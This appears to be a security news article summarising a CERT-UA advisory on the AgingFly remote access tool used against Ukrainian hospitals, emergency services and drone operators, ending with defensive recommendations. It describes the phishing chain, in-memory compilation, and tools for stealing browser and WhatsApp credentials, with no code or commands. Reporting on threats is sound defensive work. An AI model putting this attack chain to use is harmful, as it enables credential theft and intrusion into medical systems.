Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

Apr 17, 2026 · 8 min read

AgingFly Malware Hits Ukrainian Hospitals and Drone Operators—It Writes Its Own Code After Landing

CERT-UA is warning about a new threat actor that disguises itself as humanitarian aid. The malware arrives nearly empty and downloads its real commands as C# source code, compiling them inside the victim's machine.

A dimly lit hospital corridor at night with computer screens glowing at a nurses station, conveying the targeting of medical infrastructure

What CERT-UA Found

Ukraine's Computer Emergency Response Team (CERT-UA) tracked a new threat cluster, labeled UAC-0247, that has been running an active campaign since early 2026 against Ukrainian clinical hospitals, municipal emergency ambulance services, local government authorities, and personnel inside the Defense Forces, including First Person View drone operators. Activity intensified between March and April 2026.

The centerpiece of the campaign is a custom C# remote access tool named AgingFly, paired with a set of supporting utilities with names like SilentLoop, ChromElevator, ZAPiDESK, and RavenShell. Together they form a kit that pivots quickly from initial email delivery into deep credential theft, messaging compromise, and network movement. CERT-UA's reporting, corroborated by Bleeping Computer and The Record, describes about a dozen confirmed incidents so far, though the true victim count is almost certainly higher.

The Humanitarian Aid Lure

The attack opens with an email framed as a humanitarian aid proposal. Targets working inside hospitals, ambulance dispatch centers, and local government are exactly the population most likely to click a humanitarian offer without a second thought. The emails include a link that either routes to a convincingly AI generated fake aid organization website, or, more alarmingly, to a legitimate third party site that the attackers have quietly injected with a cross site scripting payload.

Clicking the link downloads a ZIP archive containing a Windows shortcut, or LNK file. Opening the shortcut silently launches mshta.exe, Microsoft's HTML Application host, which reaches back to the attackers' server, retrieves an HTA file, and executes it. A scheduled task is then dropped to keep the malware running after reboot. The same UAC-0247 operators have also been observed distributing malware through Signal, using a March 10 decoy archive named bachu.zip that impersonates legitimate drone operator software aimed at Ukraine's Defense Forces.

What Makes AgingFly Different

Most RATs ship with their command set baked in. Defenders can inspect the binary, pull the strings, and write detections for the exact instructions the malware knows how to run. AgingFly throws that approach out.

The core implant is almost empty. Its command handlers are not present in the file on disk. Instead, once installed, AgingFly asks its command and control server for C# source code, then uses the System.CodeDom and related .NET compiler APIs to compile that source into executable code directly inside the infected machine. The final, meaningful behavior of the malware is assembled on the fly, in memory, after infection.

That design means two things for defenders. First, static analysis of the installer reveals very little about what the malware actually does in a given environment. Second, operators can push radically different behavior to different victims without ever changing the file on disk. A sample that looks harmless in a sandbox can be turned into a keylogger, screenshot grabber, or lateral movement tool by sending new source text over the network. AgingFly's C2 channel uses WebSocket connections encrypted with AES-CBC and static keys, which makes traffic blend into normal application behavior more easily than raw TCP beacons.

Stealing Passwords From Chrome Without Admin Rights

Once AgingFly is running, the operators typically deploy ChromElevator, an open source credential extraction tool, against Chromium based browsers like Chrome, Edge, Brave, and Opera. ChromElevator decrypts the cookie and saved password store without requiring administrator privileges, which is notable because Chrome's newer protections were specifically designed to force attackers to escalate before touching the credential vault. The technique exploits a weakness in how the Chromium data protection API can be invoked by user level processes.

The output is the same crown jewels a typical infostealer returns: site logins, email and cloud account passwords, session cookies that can be replayed to bypass multi factor authentication, and autofilled credit card and address data. Chrome's new Device Bound Session Credentials system, which ties cookies to specific hardware, mitigates some of the cookie replay risk when sites adopt it, but most platforms have not rolled out the protection yet.

WhatsApp for Windows Becomes a Target

AgingFly's operators pair ChromElevator with ZAPiDESK, an open source forensic tool normally used by incident responders to parse WhatsApp Desktop artifacts. ZAPiDESK decrypts the local WhatsApp databases, which contain message history, contact lists, media, and device identifiers for every paired phone. A successful run gives the attacker the victim's chat archive and enough identity data to impersonate the account in follow on social engineering.

That matters for hospitals and emergency services because WhatsApp is the default day to day coordination tool for medics, dispatchers, and local government staff across Ukraine and much of eastern Europe. A compromised account does not just expose patient discussions. It lets the attacker send believable messages, framed in the real voice of the real user, to every contact in the address book, including vendors, ministries, and family members.

Lateral Movement and Persistence

Once inside a network, UAC-0247 has been observed deploying a layered toolkit. SilentLoop is a PowerShell persistence script that rotates its command and control address by reading from a Telegram channel, with backup channels in case any one account is shut down. RavenShell establishes encrypted TCP connections using lightweight 9 byte XOR keys, optimized to evade network level detection while still being fast to deploy.

For reconnaissance and pivoting, operators use a mix of legitimate administrator tools, including rustscan for fast port sweeps, ligolo-ng for SOCKS5 tunneling back to the attacker, and chisel for TCP over HTTP tunnels that punch through most outbound proxies. The combination turns a single hospital endpoint into an on network jump box for further intrusion into medical records systems, government email, or connected defense networks.

CERT-UA's Defensive Guidance

CERT-UA's advisory is practical and applies well beyond Ukraine. The recommended controls focus on limiting the legacy Windows script execution paths the malware depends on.

  • Block execution of .LNK, .HTA, and .JS files from email, Downloads, and user profile directories using AppLocker, Windows Defender Application Control, or equivalent endpoint policy.
  • Restrict or disable mshta.exe, wscript.exe, and cscript.exe through Microsoft's attack surface reduction rules, which have existed for years but remain disabled in most environments.
  • Enable constrained language mode for PowerShell to blunt scripts like SilentLoop that rely on dynamic invocation.
  • Monitor for unsigned .NET compilation events in process logs. On a normal workstation, csc.exe runs rarely and almost never under a browser or email client. A spike is a strong indicator of AgingFly style in memory compilation.
  • Audit stored credentials in Chromium browsers. If Chrome or Edge password sync is used, the device becomes a single point of failure for every saved account. Migrating to a dedicated password manager with a separate master password reduces blast radius when a machine is compromised.

Why the Target Set Matters

UAC-0247 has not been formally attributed to a nation state in public reporting so far. The target selection, however, follows a pattern familiar from other wartime espionage campaigns against Ukraine: medical infrastructure, local administrators, and military adjacent personnel, not the general public. Ambulance dispatch and clinical hospitals are high value because their communications reveal casualty numbers, unit movements, and medical supply chains. Drone operators are high value for obvious reasons.

For hospitals in neighboring countries that rely on the same software stack, the lesson is not to treat this as someone else's war. The techniques will transfer. Chipsoft ransomware hit 80% of Dutch hospitals' patient records earlier this month, and the AgingFly playbook is explicitly designed to work against any organization where Chrome stores passwords, WhatsApp handles coordination, and users are conditioned to click humanitarian looking email attachments.

The Broader Trend

AgingFly is the latest example of a modular, live updating intrusion kit that combines commodity open source tools with a bespoke C# implant. The design assumes it will be detected eventually and optimizes instead for rapid behavior changes and quiet credential exfiltration before that happens.

For defenders, the takeaway is that signature based antivirus is not enough against malware that generates its own executable logic on demand. Detection has to move up the stack to behavioral patterns: script interpreters launching compilers, browsers writing to unusual paths, .NET processes making outbound WebSocket connections to domains with no reputation. Those are the indicators that survive whatever new payload UAC-0247 decides to push tomorrow.

Stop Email Tracking in Gmail

Spy pixels track when you open emails, where you are, and what device you use. Gblock blocks them automatically.

Try Gblock Free for 30 Days

No credit card required. Works with Chrome, Edge, Brave, and Arc.